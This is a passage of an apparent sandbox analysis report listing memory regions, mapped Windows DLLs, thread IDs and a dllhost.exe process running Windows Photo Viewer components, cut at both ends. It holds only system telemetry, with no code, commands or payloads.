0x7fefe2c0000 end_va = 0x7fefe2defff entry_point = 0x7fefe2c60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1161 start_va = 0x7fefe2e0000 end_va = 0x7fefe3e8fff entry_point = 0x7fefe2e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1162 start_va = 0x7fefe3f0000 end_va = 0x7fefe51cfff entry_point = 0x7fefe43ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1163 start_va = 0x7fefe520000 end_va = 0x7fefe5befff entry_point = 0x7fefe5225a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1164 start_va = 0x7fefe5c0000 end_va = 0x7fefe5c7fff entry_point = 0x7fefe5c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1165 start_va = 0x7fefe5d0000 end_va = 0x7fefe636fff entry_point = 0x7fefe5db03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1166 start_va = 0x7fefe640000 end_va = 0x7fefe64dfff entry_point = 0x7fefe641080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1167 start_va = 0x7fefe6d0000 end_va = 0x7fefe740fff entry_point = 0x7fefe6e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1168 start_va = 0x7feff4f0000 end_va = 0x7feff4f0fff entry_point = 0x7feff4f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1169 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1170 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1171 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1172 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1173 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1174 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1175 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1176 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1177 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1178 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1179 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1180 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1181 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1182 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1183 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1184 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1185 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 66 os_tid = 0xbec Thread: id = 67 os_tid = 0xb54 Thread: id = 68 os_tid = 0x760 Thread: id = 69 os_tid = 0x784 Thread: id = 70 os_tid = 0x7f0 Thread: id = 71 os_tid = 0x7d8 Thread: id = 72 os_tid = 0x78c Thread: id = 73 os_tid = 0x758 Thread: id = 74 os_tid = 0x748 Thread: id = 75 os_tid = 0x5a8 Thread: id = 76 os_tid = 0x154 Thread: id = 77 os_tid = 0x134 Thread: id = 78 os_tid = 0x124 Thread: id = 79 os_tid = 0xf4 Thread: id = 80 os_tid = 0xcc Thread: id = 81 os_tid = 0x734 Process: id = "7" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x21ce5000" os_pid = "0x9e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0xb68" cmd_line = "C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1308 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1309 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1310 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1311 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1312 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1313 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1314 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1315 start_va = 0x80000 end_va = 0x81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1316 start_va = 0x90000 end_va = 0x90fff entry_point = 0x90000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 1317 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1318 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1319 start_va = 0x160000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1320 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1321 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1322 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1323 start_va = 0x260000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1324 start_va = 0x3f0000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1325 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1326 start_va = 0x450000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1327 start_va = 0x4d0000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1328 start_va = 0x680000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1329 start_va = 0x6c0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1330 start_va = 0x7c0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1331 start_va = 0x860000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1332 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1333 start_va = 0x900000 end_va = 0xbcefff entry_point = 0x900000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1334 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 1335 start_va = 0xc20000 end_va = 0xcfefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 1336 start_va = 0xd10000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 1337 start_va = 0xdc0000 end_va = 0xdc4fff entry_point = 0xdc0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 1338 start_va = 0xdd0000 end_va = 0x21cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 1339 start_va = 0x2270000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 1340 start_va = 0x22b0000 end_va = 0x23affff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 1341 start_va = 0x23d0000 end_va = 0x240ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1342 start_va = 0x2580000 end_va = 0x258ffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1343 start_va = 0x73440000 end_va = 0x73452fff entry_point = 0x73441d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1344 start_va = 0x736f0000 end_va = 0x738b2fff entry_point = 0x736f1a45 region_type = mapped_file name = "d3d9.dll" filename = "\\Windows\\SysWOW64\\d3d9.dll" (normalized: "c:\\windows\\syswow64\\d3d9.dll") Region: id = 1345 start_va = 0x738c0000 end_va = 0x7393ffff entry_point = 0x738d37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1346 start_va = 0x73a80000 end_va = 0x73adbfff entry_point = 0x73abf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1347 start_va = 0x73ae0000 end_va = 0x73b1efff entry_point = 0x73b0de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1348 start_va = 0x73b50000 end_va = 0x73b57fff entry_point = 0x73b520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1349 start_va = 0x73b90000 end_va = 0x73b9bfff entry_point = 0x73b91ea1 region_type = mapped_file name = "photobase.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll") Region: id = 1350 start_va = 0x73ba0000 end_va = 0x73d2ffff entry_point = 0x73c3d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1351 start_va = 0x73d30000 end_va = 0x73d39fff entry_point = 0x73d34d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 1352 start_va = 0x73d40000 end_va = 0x73d45fff entry_point = 0x73d411f0 region_type = mapped_file name = "d3d8thk.dll" filename = "\\Windows\\SysWOW64\\d3d8thk.dll" (normalized: "c:\\windows\\syswow64\\d3d8thk.dll") Region: id = 1353 start_va = 0x73d50000 end_va = 0x73d5cfff entry_point = 0x73d511e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1354 start_va = 0x73d60000 end_va = 0x73ec5fff entry_point = 0x73d840fe region_type = mapped_file name = "photoviewer.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll") Region: id = 1355 start_va = 0x74050000 end_va = 0x7408bfff entry_point = 0x74053089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 1356 start_va = 0x743f0000 end_va = 0x744eafff entry_point = 0x744017e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 1357 start_va = 0x74540000 end_va = 0x74548fff entry_point = 0x74541220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1358 start_va = 0x74550000 end_va = 0x7455dfff entry_point = 0x74551235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1359 start_va = 0x74720000 end_va = 0x748bdfff entry_point = 0x7474e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1360 start_va = 0x749d0000 end_va = 0x74a0afff entry_point = 0x749d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1361 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a12dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1362 start_va = 0x74f00000 end_va = 0x74f0bfff entry_point = 0x74f010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1363 start_va = 0x74f10000 end_va = 0x74f6ffff entry_point = 0x74f2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1364 start_va = 0x74f70000 end_va = 0x750cbfff entry_point = 0x74fbba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1365 start_va = 0x750d0000 end_va = 0x7516cfff entry_point = 0x75103fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1366 start_va = 0x751c0000 end_va = 0x751c9fff entry_point = 0x751c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1367 start_va = 0x751d0000 end_va = 0x752dffff entry_point = 0x751e32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1368 start_va = 0x752e0000 end_va = 0x753abfff entry_point = 0x752e168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1369 start_va = 0x75520000 end_va = 0x755aefff entry_point = 0x75523fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1370 start_va = 0x755d0000 end_va = 0x7567bfff entry_point = 0x755da472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1371 start_va = 0x75780000 end_va = 0x757d6fff entry_point = 0x75799ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1372 start_va = 0x757e0000 end_va = 0x758cffff entry_point = 0x757f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1373 start_va = 0x75b40000 end_va = 0x75b9ffff entry_point = 0x75b5158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1374 start_va = 0x75ca0000 end_va = 0x75ce5fff entry_point = 0x75ca7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1375 start_va = 0x75cf0000 end_va = 0x76939fff entry_point = 0x75d71601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1376 start_va = 0x76b20000 end_va = 0x76baffff entry_point = 0x76b36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1377 start_va = 0x76c40000 end_va = 0x76c58fff entry_point = 0x76c44975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1378 start_va = 0x76c60000 end_va = 0x76ce2fff entry_point = 0x76c623d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1379 start_va = 0x76e10000 end_va = 0x76f0ffff entry_point = 0x76e2b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1380 start_va = 0x76f10000 end_va = 0x76faffff entry_point = 0x76f249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1381 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fb0000" filename = "" Region: id = 1382 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x0 region_type = private name = "private_0x00000000770b0000" filename = "" Region: id = 1383 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1384 start_va = 0x773b0000 end_va = 0x7752ffff entry_point = 0x773b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1385 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1386 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1387 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1388 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1389 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1390 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1391 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1392 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1393 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1394 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1395 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1396 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1397 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1398 start_va = 0x742f0000 end_va = 0x743e4fff entry_point = 0x74300d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1445 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1446 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1447 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1448 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1449 start_va = 0xd60000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 1450 start_va = 0x21d0000 end_va = 0x224ffff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1451 start_va = 0x25e0000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1452 start_va = 0x73f20000 end_va = 0x73f4afff entry_point = 0x73f3d3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 1453 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1455 start_va = 0x73970000 end_va = 0x739bdfff entry_point = 0x73970000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 1456 start_va = 0x24c0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 1457 start_va = 0x2620000 end_va = 0x265ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1458 start_va = 0x749a0000 end_va = 0x749c0fff entry_point = 0x749a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1459 start_va = 0x75170000 end_va = 0x751b4fff entry_point = 0x751711e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1460 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1674 start_va = 0x440000 end_va = 0x446fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1675 start_va = 0x660000 end_va = 0x67efff entry_point = 0x660000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 1676 start_va = 0x800000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1677 start_va = 0x810000 end_va = 0x811fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1678 start_va = 0x820000 end_va = 0x824fff entry_point = 0x820000 region_type = mapped_file name = "photoviewer.dll.mui" filename = "\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui") Region: id = 1679 start_va = 0x830000 end_va = 0x830fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1680 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1681 start_va = 0x850000 end_va = 0x850fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1682 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1683 start_va = 0x8b0000 end_va = 0x8b0fff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1684 start_va = 0xbd0000 end_va = 0xbd0fff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1685 start_va = 0xd00000 end_va = 0xd00fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 1686 start_va = 0x26f0000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 1687 start_va = 0x2760000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 1688 start_va = 0x27f0000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 1689 start_va = 0x2800000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1690 start_va = 0x72010000 end_va = 0x721d9fff entry_point = 0x72010000 region_type = mapped_file name = "imagingengine.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll") Region: id = 1691 start_va = 0x73490000 end_va = 0x73508fff entry_point = 0x73490000 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\SysWOW64\\mscms.dll" (normalized: "c:\\windows\\syswow64\\mscms.dll") Region: id = 1692 start_va = 0x73950000 end_va = 